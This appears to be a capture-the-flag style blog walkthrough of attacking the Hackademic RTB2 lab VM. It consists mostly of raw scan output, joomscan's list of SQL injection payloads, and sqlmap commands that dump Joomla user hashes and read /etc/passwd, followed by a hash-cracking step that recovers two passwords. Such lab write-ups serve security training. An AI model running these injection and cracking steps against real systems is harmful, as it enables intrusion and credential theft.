2013. november 14., csütörtök

Hackademic RTB2 (to php-shell)

root@kali:~# netdiscover

 Currently scanning: 192.168.62.0/16   |   Screen View: Unique Hosts                                                                                        
                                                                                                                                                            
 3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180                                                                                            
 _____________________________________________________________________________
   IP            At MAC Address      Count  Len   MAC Vendor                  
 -----------------------------------------------------------------------------
 192.168.56.1    08:00:27:00:e0:df    01    060   CADMUS COMPUTER SYSTEMS                                                                                   
 192.168.56.100  08:00:27:4d:e2:d8    01    060   CADMUS COMPUTER SYSTEMS                                                                                   
 192.168.56.105  00:0c:29:74:b5:21    01    060   VMware, Inc.                                                                                              

root@kali:~# unicornscan 192.168.56.105
TCP open                http[   80]        from 192.168.56.105  ttl 64
Main [Error   chld.c:53] am i missing children?, oh well
root@kali:~# nmap -sS -sV -O 192.168.56.105 -pT:80

Starting Nmap 6.40 ( http://nmap.org ) at 2013-11-13 08:56 CET
Nmap scan report for 192.168.56.105
Host is up (0.00039s latency).
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.2.14 ((Ubuntu))
MAC Address: 00:0C:29:74:B5:21 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.17 - 2.6.36
Network Distance: 1 hop

OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 21.48 seconds
root@kali:~# nikto -host 192.168.56.105
- Nikto v2.1.5
---------------------------------------------------------------------------
+ Target IP:          192.168.56.105
+ Target Hostname:    192.168.56.105
+ Target Port:        80
+ Start Time:         2013-11-13 08:57:17 (GMT1)
---------------------------------------------------------------------------
+ Server: Apache/2.2.14 (Ubuntu)
+ Retrieved x-powered-by header: PHP/5.3.2-1ubuntu4.7
+ The anti-clickjacking X-Frame-Options header is not present.
+ Apache/2.2.14 appears to be outdated (current is at least Apache/2.2.22). Apache 1.3.42 (final release) and 2.0.64 are also current.
+ DEBUG HTTP verb may show server debugging information. See http://msdn.microsoft.com/en-us/library/e8z01xdh%28VS.80%29.aspx for details.
+ OSVDB-12184: /index.php?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-3092: /phpmyadmin/changelog.php: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.
+ OSVDB-3268: /icons/: Directory indexing found.
+ Cookie phpMyAdmin created without the httponly flag
+ Server leaks inodes via ETags, header found with file /icons/README, inode: 413560, size: 5108, mtime: 0x438c0358aae80
+ OSVDB-3233: /icons/README: Apache default file found.
+ /phpmyadmin/: phpMyAdmin directory found
+ 6544 items checked: 0 error(s) and 11 item(s) reported on remote host
+ End Time:           2013-11-13 08:57:33 (GMT1) (16 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
root@kali:~# cd /usr/share/dirb
root@kali:/usr/share/dirb# dirb http://192.168.56.105/

-----------------
DIRB v2.21   
By The Dark Raver
-----------------

START_TIME: Wed Nov 13 08:57:58 2013
URL_BASE: http://192.168.56.105/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4592                                                         

---- Scanning URL: http://192.168.56.105/ ----
+ http://192.168.56.105/cgi-bin/ (CODE:403|SIZE:290)                                                                                                        
+ http://192.168.56.105/check (CODE:200|SIZE:324)                                                                                                           
+ http://192.168.56.105/index (CODE:200|SIZE:1324)                                                                                                          
+ http://192.168.56.105/index.php (CODE:200|SIZE:1324)                                                                                                      
==> DIRECTORY: http://192.168.56.105/javascript/                                                                                                            
==> DIRECTORY: http://192.168.56.105/phpmyadmin/                                                                                                            
+ http://192.168.56.105/server-status (CODE:403|SIZE:295)                                                                                                   
                                                                                                                                                            
---- Entering directory: http://192.168.56.105/javascript/ ----
==> DIRECTORY: http://192.168.56.105/javascript/jquery/                                                                                                     
                                                                                                                                                            
---- Entering directory: http://192.168.56.105/phpmyadmin/ ----
+ http://192.168.56.105/phpmyadmin/favicon.ico (CODE:200|SIZE:18902)                                                                                        
+ http://192.168.56.105/phpmyadmin/index.php (CODE:200|SIZE:8625)                                                                                           
==> DIRECTORY: http://192.168.56.105/phpmyadmin/js/                                                                                                         
==> DIRECTORY: http://192.168.56.105/phpmyadmin/lang/                                                                                                       
+ http://192.168.56.105/phpmyadmin/libraries (CODE:403|SIZE:302)                                                                                            
+ http://192.168.56.105/phpmyadmin/phpinfo.php (CODE:200|SIZE:0)                                                                                            
+ http://192.168.56.105/phpmyadmin/setup (CODE:401|SIZE:481)                                                                                                
==> DIRECTORY: http://192.168.56.105/phpmyadmin/themes/                                                                                                     
                                                                                                                                                            
---- Entering directory: http://192.168.56.105/javascript/jquery/ ----
+ http://192.168.56.105/javascript/jquery/jquery (CODE:200|SIZE:120763)                                                                                     
                                                                                                                                                            
---- Entering directory: http://192.168.56.105/phpmyadmin/js/ ----
                                                                                                                                                            
---- Entering directory: http://192.168.56.105/phpmyadmin/lang/ ----
                                                                                                                                                            
---- Entering directory: http://192.168.56.105/phpmyadmin/themes/ ----
==> DIRECTORY: http://192.168.56.105/phpmyadmin/themes/original/                                                                                            
                                                                                                                                                            
---- Entering directory: http://192.168.56.105/phpmyadmin/themes/original/ ----
==> DIRECTORY: http://192.168.56.105/phpmyadmin/themes/original/css/                                                                                        
==> DIRECTORY: http://192.168.56.105/phpmyadmin/themes/original/img/                                                                                        
                                                                                                                                                            
---- Entering directory: http://192.168.56.105/phpmyadmin/themes/original/css/ ----
                                                                                                                                                            
---- Entering directory: http://192.168.56.105/phpmyadmin/themes/original/img/ ----
                                                                                                                                                            
-----------------
DOWNLOADED: 45920 - FOUND: 11

Iceweasel http://192.168.56.105/
http://192.168.56.105/phpmyadmin/

Mantra http://192.168.56.105/
Check
Enable post data

sqlmap -u "http://192.168.56.105/check.php" --data="username=admin&password=pass&Submit=Check%21" --level=5 --risk=5
[CRITICAL] all tested parameters appear to be not injectable.

http://192.168.56.105/phpmyadmin/Documentation.html?phpMyAdmin=1thocdud4fe6g9a8or6i6as7qaf5ee7a
phpMyAdmin 3.3.2 Documentation

root@kali:~# searchsploit phpmyadmin | grep "3.3"
phpMyAdmin 3.3.X and 3.4.X - Local File Inclusion via XXE Injection         /php/webapps/18371.rb

msfconsole
msf > search phpmyadmin
Matching Modules
================

   Name                                         Disclosure Date  Rank       Description
   ----                                         ---------------  ----       -----------
   exploit/multi/http/phpmyadmin_3522_backdoor  2012-09-25       normal     phpMyAdmin 3.5.2.2 server_sync.php Backdoor
   exploit/multi/http/phpmyadmin_preg_replace   2013-04-25       excellent  phpMyAdmin Authenticated Remote Code Execution via preg_replace()
   exploit/unix/webapp/phpmyadmin_config        2009-03-24       excellent  PhpMyAdmin Config File Code Injection


http://192.168.56.105/phpmyadmin/setup
A username and password are being requested by http://192.168.56.105. The site says: "phpMyAdmin Setup"

http user authentication.

medusa -h 192.168.56.105 -u admin -P /usr/share/wordlists/rockyou.txt -M http -m DIR:/phpmyadmin/setup -v 6
...
ACCOUNT CHECK: [http] Host: 192.168.56.105 (1 of 1, 0 complete) User: admin (1 of 1, 0 complete) Password: kadence (16690 of 14344391 complete)
GENERAL: Unable to connect: unreachable destination
NOTICE: http.mod: failed to connect, port 80 was not open on 192.168.56.105
GENERAL: Medusa has finished.

medusa -h 192.168.56.105 -u admin -P /usr/share/metasploit-framework/data/john/wordlists/password.lst -M http -m DIR:/phpmyadmin/setup -v 6
...
ACCOUNT CHECK: [http] Host: 192.168.56.105 (1 of 1, 0 complete) User: admin (1 of 1, 0 complete) Password: fletching (28231 of 88395 complete)
GENERAL: Unable to connect: unreachable destination
NOTICE: http.mod: failed to connect, port 80 was not open on 192.168.56.105
GENERAL: Medusa has finished.


medusa -h 192.168.56.105 -M web-form -m FORM:"check.php" -m DENY-SIGNAL:"Please try again" -m FORM-DATA:"post?username=&password=&Submit=Check%21" -u admin -P /usr/share/sqlmap/txt/wordlist.txt -v 6
...
medusa -h 192.168.56.105 -M web-form -m FORM:"check.php" -m DENY-SIGNAL:"Please try again" -m FORM-DATA:"post?username=&password=&Submit=Check%21" -u admin -P /usr/share/metasploit-framework/data/john/wordlists/password.lst -v 6
...
GENERAL: Medusa has finished.

NOTHING........

Going to back the 1st step....

root@kali:~# nmap 192.168.56.105

Starting Nmap 6.40 ( http://nmap.org ) at 2013-11-13 16:01 CET
Nmap scan report for 192.168.56.105
Host is up (0.00010s latency).
Not shown: 998 closed ports
PORT    STATE    SERVICE
80/tcp  open     http
666/tcp filtered doom
MAC Address: 00:0C:29:74:B5:21 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 13.23 seconds

root@kali:~# nmap -sS  192.168.56.105 -pT1-65535

Starting Nmap 6.40 ( http://nmap.org ) at 2013-11-13 16:25 CET
Nmap scan report for 192.168.56.105
Host is up (0.00018s latency).
Not shown: 65533 closed ports
PORT    STATE    SERVICE
80/tcp  open     http
666/tcp filtered doom
MAC Address: 00:0C:29:74:B5:21 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 20.86 seconds
root@kali:~# nmap -sS  192.168.56.105 -p 1-65535

Starting Nmap 6.40 ( http://nmap.org ) at 2013-11-13 16:25 CET
Nmap scan report for 192.168.56.105
Host is up (0.00011s latency).
Not shown: 65533 closed ports
PORT    STATE    SERVICE
80/tcp  open     http
666/tcp filtered doom
MAC Address: 00:0C:29:74:B5:21 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 20.81 seconds
root@kali:~# nmap -sS  192.168.56.105 -p 1-65535

Starting Nmap 6.40 ( http://nmap.org ) at 2013-11-13 16:26 CET
Nmap scan report for 192.168.56.105
Host is up (0.00012s latency).
Not shown: 65533 closed ports
PORT    STATE SERVICE
80/tcp  open  http
666/tcp open  doom
MAC Address: 00:0C:29:74:B5:21 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 20.85 seconds
root@kali:~# nmap -sV  192.168.56.105 -pT:666

Starting Nmap 6.40 ( http://nmap.org ) at 2013-11-13 16:27 CET
Nmap scan report for 192.168.56.105
Host is up (0.00041s latency).
PORT    STATE SERVICE VERSION
666/tcp open  http    Apache httpd 2.2.14 ((Ubuntu))
MAC Address: 00:0C:29:74:B5:21 (VMware)

Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 30.38 seconds

http://192.168.56.105:666/

Powered by joomla 1.5 templates.

root@kali:~# joomscan -u http://192.168.56.105:666/


 ..|''||   '|| '||'  '|'     |      .|'''.|  '||''|. 
.|'    ||   '|. '|.  .'     |||     ||..  '   ||   ||
||      ||   ||  ||  |     |  ||     ''|||.   ||...|'
'|.     ||    ||| |||     .''''|.  .     '||  ||     
 ''|...|'      |   |     .|.  .||. |'....|'  .||.    
   

=================================================================
OWASP Joomla! Vulnerability Scanner v0.0.4 
(c) Aung Khant, aungkhant]at[yehg.net
YGN Ethical Hacker Group, Myanmar, http://yehg.net/lab
Update by: Web-Center, http://web-center.si (2011)
=================================================================


Vulnerability Entries: 611
Last update: February 2, 2012

Use "update" option to update the database
Use "check" option to check the scanner update
Use "download" option to download the scanner latest version package
Use svn co to update the scanner and the database
svn co https://joomscan.svn.sourceforge.net/svnroot/joomscan joomscan


Target: http://192.168.56.105:666

Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7


## Checking if the target has deployed an Anti-Scanner measure

[!] Scanning Passed ..... OK


## Detecting Joomla! based Firewall ...

[!] No known firewall detected!


## Fingerprinting in progress ...

~Generic version family ....... [1.5.x]

~1.5.x en-GB.ini revealed [1.5.12 - 1.5.14]

* Deduced version range is : [1.5.12 - 1.5.14]

## Fingerprinting done.


## 3 Components Found in front page  ##

 com_mailto     com_user   
 com_abc   




Vulnerabilities Discovered
==========================

# 1
Info -> Generic: htaccess.txt has not been renamed.
Versions Affected: Any
Check: /htaccess.txt
Exploit: Generic defenses implemented in .htaccess are not available, so exploiting is more likely to succeed.
Vulnerable? Yes

# 2
Info -> Generic: Unprotected Administrator directory
Versions Affected: Any
Check: /administrator/
Exploit: The default /administrator directory is detected. Attackers can bruteforce administrator accounts. Read: http://yehg.net/lab/pr0js/view.php/MULTIPLE%20TRICKY%20WAYS%20TO%20PROTECT.pdf
Vulnerable? N/A

# 3
Info -> Core: Multiple XSS/CSRF Vulnerability
Versions Affected: 1.5.9 <=
Check: /?1.5.9-x
Exploit: A series of XSS and CSRF faults exist in the administrator application.  Affected administrator components include com_admin, com_media, com_search.  Both com_admin and com_search contain XSS vulnerabilities, and com_media contains 2 CSRF vulnerabilities. 
Vulnerable? No

# 4
Info -> Core: JSession SSL Session Disclosure Vulnerability
Versions effected: Joomla! 1.5.8 <=
Check: /?1.5.8-x
Exploit: When running a site under SSL (the entire site is forced to be under ssl), Joomla! does not set the SSL flag on the cookie.  This can allow someone monitoring the network to find the cookie related to the session.
Vulnerable? No

# 5
Info -> Core: Frontend XSS Vulnerability
Versions effected: 1.5.10 <=
Check: /?1.5.10-x
Exploit: Some values were output from the database without being properly escaped.  Most strings in question were sourced from the administrator panel. Malicious normal admin can leverage it to gain access to super admin.
Vulnerable? No

# 6
Info -> Core: Missing JEXEC Check - Path Disclosure Vulnerability
Versions effected: 1.5.11 <=
Check: /libraries/phpxmlrpc/xmlrpcs.php
Exploit: /libraries/phpxmlrpc/xmlrpcs.php
Vulnerable? No

# 7
Info -> Core: Missing JEXEC Check - Path Disclosure Vulnerability
Versions effected: 1.5.12 <=
Check: /libraries/joomla/utilities/compat/php50x.php
Exploit: /libraries/joomla/utilities/compat/php50x.php
Vulnerable? No

# 8
Info -> Core: Frontend XSS - HTTP_REFERER not properly filtered Vulnerability
Versions effected: 1.5.11 <=
Check: /?1.5.11-x-http_ref
Exploit: An attacker can inject JavaScript or DHTML code that will be executed in the context of targeted user browser, allowing the attacker to steal cookies. HTTP_REFERER variable is not properly parsed.
Vulnerable? No

# 9
Info -> Core: Frontend XSS - PHP_SELF not properly filtered Vulnerability
Versions effected: 1.5.11 <=
Check: /?1.5.11-x-php-s3lf
Exploit: An attacker can inject JavaScript code in a URL that will be executed in the context of targeted user browser.
Vulnerable? No

# 10
Info -> Core: Authentication Bypass Vulnerability
Versions effected: Joomla! 1.5.3 <=
Check: /administrator/
Exploit: Backend accepts any password for custom Super Administrator when LDAP enabled
Vulnerable? No

# 11
Info -> Core: Path Disclosure Vulnerability
Versions effected: Joomla! 1.5.3 <=
Check: /?1.5.3-path-disclose
Exploit: Crafted URL can disclose absolute path
Vulnerable? No

# 12
Info -> Core: User redirected Spamming Vulnerability
Versions effected: Joomla! 1.5.3 <=
Check: /?1.5.3-spam
Exploit: User redirect spam
Vulnerable? No

# 13
Info -> Core: joomla.php Remote File Inclusion Vulnerability
Versions effected: 1.0.0
Check: /includes/joomla.php
Exploit: /includes/joomla.php?includepath=
Vulnerable? No

# 14
Info -> Core: Admin Backend Cross Site Request Forgery Vulnerability
Versions effected: 1.0.13 <=
Check: /administrator/
Exploit: It requires an administrator to be logged in and to be tricked into a specially crafted webpage.
Vulnerable? Yes

# 15
Info -> Core: Path Disclosure Vulnerability
Versions effected: Joomla! 1.5.12 <=
Check: /libraries/joomla/utilities/compat/php50x.php
Exploit: /libraries/joomla/utilities/compat/php50x.php
Vulnerable? No

# 16
Info -> CorePlugin: Xstandard Editor X_CMS_LIBRARY_PATH Local Directory Traversal Vulnerability
Versions effected: Joomla! 1.5.8 <=
Check: /plugins/editors/xstandard/attachmentlibrary.php
Exploit: Submit new header X_CMS_LIBRARY_PATH with value ../ to  /plugins/editors/xstandard/attachmentlibrary.php
Vulnerable? No

# 17
Info -> CoreTemplate: ja_purity XSS Vulnerability
Versions effected: 1.5.10 <=
Check: /templates/ja_purity/
Exploit: A XSS vulnerability exists in the JA_Purity template which ships with Joomla! 1.5.
Vulnerable? No

# 18
Info -> CoreLibrary: phpmailer Remote Code Execution Vulnerability
Versions effected: Joomla! 1.5.0 Beta/Stable
Check: /libraries/phpmailer/phpmailer.php
Exploit: N/A
Vulnerable? No

# 19
Info -> CorePlugin: TinyMCE TinyBrowser addon multiple vulnerabilities
Versions effected: Joomla! 1.5.12
Check: /plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser/
Exploit: While Joomla! team announced only File Upload vulnerability, in fact there are many. See: http://www.milw0rm.com/exploits/9296
Vulnerable? Yes

# 20
Info -> CoreComponent: Joomla Remote Admin Password Change Vulnerability
Versions Affected: 1.5.5 <=
Check: /components/com_user/controller.php
Exploit: 1. Go to url : target.com/index.php?option=com_user&view=reset&layout=confirm  2. Write into field "token" char ' and Click OK.  3. Write new password for admin  4. Go to url : target.com/administrator/  5. Login admin with new password
Vulnerable? No

# 21
Info -> CoreComponent: com_content SQL Injection Vulnerability
Version Affected: Joomla! 1.0.0 <=
Check: /components/com_content/
Exploit: /index.php?option=com_content&task=blogcategory&id=60&Itemid=99999+UNION+SELECT+1,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),3,4,5+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
Vulnerable? No

# 22
Info -> CoreComponent: com_search Remote Code Execution Vulnerability
Version Affected: Joomla! 1.5.0 beta 2 <=
Check: /components/com_search/
Exploit: /index.php?option=com_search&Itemid=1&searchword=%22%3Becho%20md5(911)%3B
Vulnerable? No

# 23
Info -> CoreComponent: MailTo SQL Injection Vulnerability
Versions effected: N/A
Check: /components/com_mailto/
Exploit: /index.php?option=com_mailto&tmpl=mailto&article=550513+and+1=2+union+select+concat(username,char(58),password)+from+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--&Itemid=1
Vulnerable? No

# 24
Info -> CoreComponent: com_content Blind SQL Injection Vulnerability
Versions effected: Joomla! 1.5.0 RC3
Check: /components/com_content/
Exploit: /index.php?option=com_content&view=%' +'a'='a&id=25&Itemid=28
Vulnerable? No

# 25
Info -> CoreComponent: com_content XSS Vulnerability
Version Affected: Joomla! 1.5.7 <=
Check: /components/com_content/
Exploit: The defaults on com_content article submission allow entry of dangerous HTML tags (script, etc).  This only affects users with access level Author or higher, and only if you have not set filtering options in com_content configuration.
Vulnerable? No

# 26
Info -> CoreComponent: com_weblinks XSS Vulnerability
Version Affected: Joomla! 1.5.7 <=
Check: /components/com_weblinks/
Exploit: [Requires valid user account] com_weblinks allows raw HTML into the title and description tags for weblink submissions (from both the administrator and site submission forms).
Vulnerable? No

# 27
Info -> CoreComponent: com_mailto Email Spam Vulnerability
Version Affected: Joomla! 1.5.6 <=
Check: /components/com_mailto/
Exploit: The mailto component does not verify validity of the URL prior to sending.
Vulnerable? No

# 28
Info -> CoreComponent: com_content view=archive SQL Injection Vulnerability
Versions effected: Joomla! 1.5.0 Beta1/Beta2/RC1
Check: /components/com_content/
Exploit: Unfiltered POST vars - filter, month, year  to /index.php?option=com_content&view=archive
Vulnerable? No

# 29
Info -> CoreComponent: com_content XSS Vulnerability
Version Affected: Joomla! 1.5.9 <=
Check: /components/com_content/
Exploit: A XSS vulnerability exists in the category view of com_content.
Vulnerable? No

# 30
Info -> CoreComponent: com_search Memory Comsumption DoS Vulnerability
Versions effected: Joomla! 1.5.0 Beta
Check: /components/com_search/
Exploit: N/A
Vulnerable? No

# 31
Info -> CoreComponent: com_poll (mosmsg) Memory Consumption DOS Vulnerability
Versions effected: 1.0.7 <=
Check: /components/com_poll/
Exploit: Send request  /index.php?option=com_poll&task=results&id=14&mosmsg=DOS@HERE<<>AAA<><>
Vulnerable? No

# 32
Info -> CoreComponent: com_banners Blind SQL Injection Vulnerability
Versions effected: N/A
Check: /components/com_banners/
Exploit: /index.php?option=com_banners&task=archivesection&id=0'+and+'1'='1::/index.php?option=com_banners&task=archivesection&id=0'+and+'1'='2
Vulnerable? No

# 33
Info -> CoreComponent: com_mailto timeout Vulnerability
Versions effected: 1.5.13 <=
Check: /components/com_mailto/
Exploit: [Requires a valid user account] In com_mailto, it was possible to bypass timeout protection against sending automated emails.
Vulnerable? Yes

# 34
Info -> Component: Amblog SQL Injection
Versions Affected: 1.0
Check: /index.php?option=com_amblog&view=amblog&catid=-1UNIONSELECT@@version
Exploit: /index.php?option=com_amblog&view=amblog&catid=-1 UNION SELECT @@version
Vulnerable? No

# 35
Info -> Component: Component com_newsfeeds SQL injection
Versions Affected: Any <=
Check: /index.php?option=com_newsfeeds&view=categories&feedid=-1%20union%20select%201,concat%28username,char%2858%29,password%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30%20from%20jos_users--
Exploit: /index.php?option=com_newsfeeds&view=categories&feedid=-1%20union%20select%201,concat%28username,char%2858%29,password%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30%20from%20jos_users--
Vulnerable? No

# 36
Info -> Component: ABC Extension com_abc SQL
Versions Affected: 1.1.7 <=
Check: /index.php?option=com_abc&view=abc&letter=AS&sectionid='
Exploit: /index.php?option=com_abc&view=abc&letter=AS&sectionid='
Vulnerable? N/A

# 37
Info -> Component: Joomla Component com_searchlog SQL Injection
Versions Affected: 3.1.0 <=
Check: /administrator/index.php?option=com_searchlog&act=log
Exploit: /administrator/index.php?option=com_searchlog&act=log
Vulnerable? No

# 38
Info -> Component: Joomla Component com_djartgallery Multiple Vulnerabilities
Versions Affected: 0.9.1 <=
Check: /administrator/index.php?option=com_djartgallery&task=editItem&cid[]=1'+and+1=1+--+
Exploit: /administrator/index.php?option=com_djartgallery&task=editItem&cid[]=1'+and+1=1+--+
Vulnerable? N/A

There are 4 vulnerable points in 38 found entries!

~[*] Time Taken: 44 sec
~[*] Send bugs, suggestions, contributions to joomscan@yehg.net
root@kali:~#

http://192.168.56.105:666/plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser/upload.php?type=file&folder=
Restricted access

root@kali:~# nikto -host 192.168.56.105 -port 666
- Nikto v2.1.5
---------------------------------------------------------------------------
+ Target IP:          192.168.56.105
+ Target Hostname:    192.168.56.105
+ Target Port:        666
+ Start Time:         2013-11-13 16:58:24 (GMT1)
---------------------------------------------------------------------------
+ Server: Apache/2.2.14 (Ubuntu)
+ Retrieved x-powered-by header: PHP/5.3.2-1ubuntu4.7
+ The anti-clickjacking X-Frame-Options header is not present.
+ Cookie 8eb16cd5703c7dc43799386d6dcb4057 created without the httponly flag
+ Server leaks inodes via ETags, header found with file /robots.txt, inode: 147545, size: 304, mtime: 0x41a7982c29d80
+ File/dir '/administrator/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ File/dir '/cache/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ File/dir '/components/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ File/dir '/images/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ File/dir '/includes/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ File/dir '/language/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ File/dir '/libraries/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ File/dir '/media/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ File/dir '/modules/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ File/dir '/plugins/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ File/dir '/templates/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ OSVDB-3268: /tmp/: Directory indexing found.
+ File/dir '/tmp/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Cookie dc5b33c885319f0ed52b91c702cf76e9 created without the httponly flag
+ File/dir '/xmlrpc/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ "robots.txt" contains 14 entries which should be manually viewed.
+ OSVDB-39272: favicon.ico file identifies this server as: Joomla
+ IP address found in the 'location' header. The IP is "127.0.1.1".
+ OSVDB-630: IIS may reveal its internal or real IP in the Location header via a request to the /images directory. The value is "http://127.0.1.1:666/images/".
+ Apache/2.2.14 appears to be outdated (current is at least Apache/2.2.22). Apache 1.3.42 (final release) and 2.0.64 are also current.
+ DEBUG HTTP verb may show server debugging information. See http://msdn.microsoft.com/en-us/library/e8z01xdh%28VS.80%29.aspx for details.
+ OSVDB-877: HTTP TRACK method is active, suggesting the host is vulnerable to XST
+ OSVDB-12184: /index.php?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-3092: /administrator/: This might be interesting...
+ OSVDB-3092: /includes/: This might be interesting...
+ OSVDB-3092: /logs/: This might be interesting...
+ OSVDB-3092: /phpmyadmin/changelog.php: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.
+ OSVDB-3092: /tmp/: This might be interesting...
+ OSVDB-3268: /icons/: Directory indexing found.
+ Cookie phpMyAdmin created without the httponly flag
+ OSVDB-3233: /icons/README: Apache default file found.
+ /htaccess.txt: Default Joomla! htaccess.txt file found. This should be removed or renamed.
+ /administrator/index.php: Admin login page/section found.
+ /configuration/: Admin login page/section found.
+ /phpmyadmin/: phpMyAdmin directory found
+ 6544 items checked: 0 error(s) and 38 item(s) reported on remote host
+ End Time:           2013-11-13 16:58:56 (GMT1) (32 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested


http://192.168.56.105:666/

sqlmap -u "http://192.168.56.105:666/index.php?option=com_abc&view=abc&letter=List+of+content+items...&Itemid=3"
--dbs

available databases [4]:
[*] information_schema
[*] joomla
[*] mysql
[*] phpmyadmin

...

sqlmap -u "http://192.168.56.105:666/index.php?option=com_abc&view=abc&letter=List+of+content+items...&Itemid=3" -D joomla -T jos_users -C id,username,password --dump

+----+---------------+-------------------------------------------------------------------+
| id | username      | password                                                          |
+----+---------------+-------------------------------------------------------------------+
| 62 | Administrator | 08f43b7f40fb0d56f6a8fb0271ec4710:n9RMVci9nqTUog3GjVTNP7IuOrPayqAl |
| 63 | JSmith        | 992396d7fc19fd76393f359cb294e300:70NFLkBrApLamH9VNGjlViJLlJsB60KF |
| 64 | BTallor       | abe1ae513c16f2a021329cc109071705:FdOrWkL8oMGl1Tju0aT7ReFsOwIMKliy |
| 65 | test          | be384a53bb01ae8acac1ea24dfdd065f:wpMwwAIdOLfdUbnSP9rhynCv0RLQvGQX |
+----+---------------+-------------------------------------------------------------------+


sqlmap -u "http://192.168.56.105:666/index.php?option=com_abc&view=abc&letter=List+of+content+items...&Itemid=3" --file-read "/etc/passwd"
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
syslog:x:101:103::/home/syslog:/bin/false
messagebus:x:102:107::/var/run/dbus:/bin/false
avahi-autoipd:x:103:110:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/bin/false
avahi:x:104:111:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false
couchdb:x:105:113:CouchDB Administrator,,,:/var/lib/couchdb:/bin/bash
speech-dispatcher:x:106:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/sh
usbmux:x:107:46:usbmux daemon,,,:/home/usbmux:/bin/false
haldaemon:x:108:114:Hardware abstraction layer,,,:/var/run/hald:/bin/false
kernoops:x:109:65534:Kernel Oops Tracking Daemon,,,:/:/bin/false
pulse:x:110:115:PulseAudio daemon,,,:/var/run/pulse:/bin/false
rtkit:x:111:117:RealtimeKit,,,:/proc:/bin/false
saned:x:112:118::/home/saned:/bin/false
hplip:x:113:7:HPLIP system user,,,:/var/run/hplip:/bin/false
gdm:x:114:120:Gnome Display Manager:/var/lib/gdm:/bin/false
p0wnbox:x:1000:1000:p0wnbox,,,:/home/p0wnbox:/bin/bash
mysql:x:115:123:MySQL Server,,,:/var/lib/mysql:/bin/false


download joomla_cracker.pl

a.pass:
Administrator:08f43b7f40fb0d56f6a8fb0271ec4710:n9RMVci9nqTUog3GjVTNP7IuOrPayqAl
JSmith:992396d7fc19fd76393f359cb294e300:70NFLkBrApLamH9VNGjlViJLlJsB60KF
BTallor:abe1ae513c16f2a021329cc109071705:FdOrWkL8oMGl1Tju0aT7ReFsOwIMKliy
test:be384a53bb01ae8acac1ea24dfdd065f:wpMwwAIdOLfdUbnSP9rhynCv0RLQvGQX

root@kali:~# perl joomla-cracker.pl a.pass /usr/share/metasploit-framework/data/john/wordlists/password.lst
Found hash/plain/user = 992396d7fc19fd76393f359cb294e300:70NFLkBrApLamH9VNGjlViJLlJsB60KF / matrix / JSmith
Found hash/plain/user = be384a53bb01ae8acac1ea24dfdd065f:wpMwwAIdOLfdUbnSP9rhynCv0RLQvGQX / test / test
